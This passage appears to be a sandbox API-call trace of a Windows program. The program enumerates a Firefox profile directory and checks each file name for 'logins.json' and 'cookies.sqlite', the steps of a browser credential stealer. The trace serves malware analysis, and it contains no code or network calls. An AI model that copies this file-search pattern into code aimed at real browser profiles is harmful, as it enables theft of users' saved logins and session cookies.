RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.216] GetProcessHeap () returned 0x8e0000 [0161.216] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9259f0 | out: hHeap=0x8e0000) returned 1 [0161.216] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned 97 [0161.216] lstrlenW (lpString="\\") returned 1 [0161.216] GetProcessHeap () returned 0x8e0000 [0161.216] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc6) returned 0x925920 [0161.216] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0161.216] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\" [0161.217] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned 98 [0161.217] lstrlenW (lpString="moz-safe-about+home") returned 19 [0161.217] GetProcessHeap () returned 0x8e0000 [0161.217] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xec) returned 0x9259f0 [0161.217] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\" [0161.217] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpString2="moz-safe-about+home" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0161.217] VirtualQuery (in: lpAddress=0x925920, lpBuffer=0x2deff0, dwLength=0x1c | out: lpBuffer=0x2deff0*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.217] GetProcessHeap () returned 0x8e0000 [0161.217] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925920 | out: hHeap=0x8e0000) returned 1 [0161.217] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home", lpSrch="logins.json") returned 0x0 [0161.217] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home", lpSrch="cookies.sqlite") returned 0x0 [0161.217] VirtualQuery (in: lpAddress=0x9259f0, lpBuffer=0x2deffc, dwLength=0x1c | out: lpBuffer=0x2deffc*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.217] GetProcessHeap () returned 0x8e0000 [0161.217] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9259f0 | out: hHeap=0x8e0000) returned 1 [0161.217] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df048 | out: lpFindFileData=0x2df048*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="moz-safe-about+home", cAlternateFileName="MOZ-SA~1")) returned 0 [0161.217] FindClose (in: hFindFile=0x8f9b00 | out: hFindFile=0x8f9b00) returned 1 [0161.217] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2deffc, dwLength=0x1c | out: lpBuffer=0x2deffc*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.217] GetProcessHeap () returned 0x8e0000 [0161.217] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.217] VirtualQuery (in: lpAddress=0x925850, lpBuffer=0x2deffc, dwLength=0x1c | out: lpBuffer=0x2deffc*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.217] GetProcessHeap () returned 0x8e0000 [0161.217] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925850 | out: hHeap=0x8e0000) returned 1 [0161.217] VirtualQuery (in: lpAddress=0x925780, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.217] GetProcessHeap () returned 0x8e0000 [0161.217] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925780 | out: hHeap=0x8e0000) returned 1 [0161.217] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.217] lstrlenW (lpString="\\") returned 1 [0161.217] GetProcessHeap () returned 0x8e0000 [0161.217] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.217] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.217] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.217] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.217] lstrlenW (lpString="indexedDB") returned 9 [0161.218] GetProcessHeap () returned 0x8e0000 [0161.218] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc4) returned 0x925780 [0161.218] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.218] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="indexedDB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0161.218] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.218] GetProcessHeap () returned 0x8e0000 [0161.218] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.218] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB", lpSrch="logins.json") returned 0x0 [0161.218] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB", lpSrch="cookies.sqlite") returned 0x0 [0161.218] VirtualQuery (in: lpAddress=0x925780, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.218] GetProcessHeap () returned 0x8e0000 [0161.218] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925780 | out: hHeap=0x8e0000) returned 1 [0161.218] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb4815eb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb4815eb0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x853f60d0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="key3.db", cAlternateFileName="")) returned 1 [0161.218] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.218] lstrlenW (lpString="\\") returned 1 [0161.218] GetProcessHeap () returned 0x8e0000 [0161.218] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.218] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.218] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.218] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.218] lstrlenW (lpString="key3.db") returned 7 [0161.218] GetProcessHeap () returned 0x8e0000 [0161.218] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc0) returned 0x925780 [0161.218] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.218] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="key3.db" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db" [0161.218] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.218] GetProcessHeap () returned 0x8e0000 [0161.218] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.218] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db", lpSrch="logins.json") returned 0x0 [0161.218] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db", lpSrch="cookies.sqlite") returned 0x0 [0161.218] VirtualQuery (in: lpAddress=0x925780, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.218] GetProcessHeap () returned 0x8e0000 [0161.218] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925780 | out: hHeap=0x8e0000) returned 1 [0161.218] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x850d63f0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x850d63f0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x850d63f0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x501, dwReserved0=0x0, dwReserved1=0x0, cFileName="localstore.rdf", cAlternateFileName="LOCALS~1.RDF")) returned 1 [0161.219] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.219] lstrlenW (lpString="\\") returned 1 [0161.219] GetProcessHeap () returned 0x8e0000 [0161.219] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.219] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.219] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.219] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.219] lstrlenW (lpString="localstore.rdf") returned 14 [0161.219] GetProcessHeap () returned 0x8e0000 [0161.219] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xce) returned 0x8fce90 [0161.219] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.219] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="localstore.rdf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf" [0161.219] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.219] GetProcessHeap () returned 0x8e0000 [0161.219] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.219] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf", lpSrch="logins.json") returned 0x0 [0161.219] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf", lpSrch="cookies.sqlite") returned 0x0 [0161.219] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.219] GetProcessHeap () returned 0x8e0000 [0161.219] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.219] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb6518ad0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb6518ad0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x85572e90, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x39, dwReserved0=0x0, dwReserved1=0x0, cFileName="marionette.log", cAlternateFileName="MARION~1.LOG")) returned 1 [0161.219] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.219] lstrlenW (lpString="\\") returned 1 [0161.219] GetProcessHeap () returned 0x8e0000 [0161.219] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.219] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.219] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.219] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.219] lstrlenW (lpString="marionette.log") returned 14 [0161.219] GetProcessHeap () returned 0x8e0000 [0161.219] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xce) returned 0x8fce90 [0161.220] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.220] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="marionette.log" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log" [0161.220] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.220] GetProcessHeap () returned 0x8e0000 [0161.220] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.220] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log", lpSrch="logins.json") returned 0x0 [0161.220] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log", lpSrch="cookies.sqlite") returned 0x0 [0161.220] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.220] GetProcessHeap () returned 0x8e0000 [0161.220] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.220] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb50b6e70, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb5175550, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb5175550, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xef3, dwReserved0=0x0, dwReserved1=0x0, cFileName="mimeTypes.rdf", cAlternateFileName="MIMETY~1.RDF")) returned 1 [0161.220] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.220] lstrlenW (lpString="\\") returned 1 [0161.220] GetProcessHeap () returned 0x8e0000 [0161.220] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.220] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.220] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.220] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.220] lstrlenW (lpString="mimeTypes.rdf") returned 13 [0161.220] GetProcessHeap () returned 0x8e0000 [0161.220] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xcc) returned 0x8fce90 [0161.220] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.220] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="mimeTypes.rdf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf" [0161.220] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.220] GetProcessHeap () returned 0x8e0000 [0161.220] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.220] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf", lpSrch="logins.json") returned 0x0 [0161.220] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf", lpSrch="cookies.sqlite") returned 0x0 [0161.220] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, 